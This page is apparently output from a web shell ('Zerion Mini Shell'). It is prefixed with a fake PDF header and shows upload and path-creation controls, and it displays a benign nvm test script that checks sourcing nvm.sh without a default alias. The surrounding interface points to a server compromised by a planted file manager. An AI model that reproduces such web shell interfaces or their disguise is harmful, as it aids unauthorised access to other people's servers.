%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/opti/optisoftcom/.nvm/test/sourcing/
Upload File :
Create Path :
Current File : /home/opti/optisoftcom/.nvm/test/sourcing/Sourcing nvm.sh with no default should return 0

#!/bin/sh

die () { echo "$@" ; exit 1; }

touch ../../alias/default
rm ../../alias/default || die 'removal of default alias failed'
nvm_alias default && die '"nvm_alias default" did not fail'

set -e # necessary to fail internally with a nonzero code

\. ../../nvm.sh || die 'sourcing returned nonzero exit code'

Zerion Mini Shell 1.0